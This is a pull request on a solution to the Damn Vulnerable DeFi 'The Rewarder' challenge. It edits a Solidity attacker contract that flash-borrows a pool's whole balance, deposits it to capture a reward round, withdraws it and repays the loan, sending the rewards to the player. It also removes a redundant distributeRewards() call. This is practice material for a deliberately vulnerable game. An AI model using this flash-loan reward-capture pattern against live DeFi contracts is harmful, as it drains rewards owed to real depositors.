### PR TITLE
Update in The Rewarder solution

### DIFF
--- a/contracts/player-contracts/AttackTheRewarder.sol
+++ b/contracts/player-contracts/AttackTheRewarder.sol
@@ -8,12 +8,11 @@ interface IFlashloanPool {
 
 interface IRewardPool {
     function deposit(uint256 amount) external;
-    function distributeRewards() external returns (uint256 rewards);
+
     function withdraw(uint256 amount) external;
 }
 
 contract AttackTheRewarder {
-
     IFlashloanPool immutable flashLoanPool;
     IRewardPool immutable rewardPool;
     IERC20 immutable liquidityToken;
@@ -21,8 +20,11 @@ contract AttackTheRewarder {
     address immutable player;
 
     constructor(
-        address _flashloanPool, address _rewardPool, address _liquidityToken, address _rewardToken
-    ){
+        address _flashloanPool,
+        address _rewardPool,
+        address _liquidityToken,
+        address _rewardToken
+    ) {
         flashLoanPool = IFlashloanPool(_flashloanPool);
         rewardPool = IRewardPool(_rewardPool);
         liquidityToken = IERC20(_liquidityToken);
@@ -31,9 +33,10 @@ contract AttackTheRewarder {
     }
 
     function attack() external {
-        flashLoanPool.flashLoan(liquidityToken.balanceOf(address(flashLoanPool)));
+        flashLoanPool.flashLoan(
+            liquidityToken.balanceOf(address(flashLoanPool))
+        );
     }
-
 
     function receiveFlashLoan(uint256 amount) external {
         require(msg.sender == address(flashLoanPool));
@@ -42,12 +45,10 @@ contract AttackTheRewarder {
         // Deposit --> Get Rewards --> Withdraw
         liquidityToken.approve(address(rewardPool), amount);
         rewardPool.deposit(amount);
-        rewardPool.distributeRewards();
         rewardPool.withdraw(amount);
 
         // Pay back the loan & send reward tokens to player
         liquidityToken.transfer(address(flashLoanPool), amount);
         rewardToken.transfer(player, rewardToken.balanceOf(address(this)));
     }
-
 }


### PR DESCRIPTION
Hello Johnny, 

while doing Damn vulnerable DeFi challenges and checking your solution, i noticed you unnecessarily call the `distributeRewards()` function in your attacker contract. Indeed, `distributeRewards()` is automatically called into the `deposit()` function of the RewarderPool. That way, just depositing after setting block.timestamp 5 days later is enough to mint the accounting tokens and to also mint the reward token for the new round triggered by the deposit.